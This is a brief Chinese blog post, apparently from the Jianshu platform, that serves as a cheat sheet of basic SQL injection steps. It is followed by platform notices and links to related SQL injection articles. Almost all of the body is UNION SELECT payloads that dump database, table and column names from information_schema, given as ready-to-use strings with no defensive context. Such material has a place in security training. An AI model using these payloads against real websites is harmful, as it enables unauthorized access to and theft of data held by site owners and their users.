sql注入基本操作

id后的符号视情况而定

爆数据库

 union select 1,group_concat(schema_name),3 from information_schema.schemata--+

union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

爆数据表

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=' '--+

爆数据表的列

union select 1,group_concat(column_name),3 from information_schema.columns where table_name=' '--+

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • Sql注入
    Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行...
    付出从未后悔阅读 3,998评论 0 3
  • 高级绕过总结
    web应用程序会对用户的输入进行验证,过滤其中的一些关键字,这种过滤我们可以试着用下面的方法避开。 1、 不使用被...
    查无此人asdasd阅读 12,188评论 0 5
  • 【sql注入天书】黑客必学
    MSSQL 跨库查询(臭要饭的!黑夜) 榨干MS SQL最后一滴血 SQL语句参考及记录集对象详解 关于SQL S...
    碧海生曲阅读 11,046评论 0 1
  • 二、 sql注入的类别特性及对应payload
    注: 以下payload均基于单引号字符型注入。若是整型注入,需将单引号与后面的注释符(--+)都去掉;若是双引号...
    就是爱文艺阅读 11,426评论 1 4
  • 遇见崭新的自己
    与过去的那个自己说再见,不要轻易说“我就是这样做事的”或者“我就是这样的性格”……相反的是,我们可以不设限地去尝试...
    小慕雅的牧屋阅读 4,597评论 1 6

友情链接更多精彩内容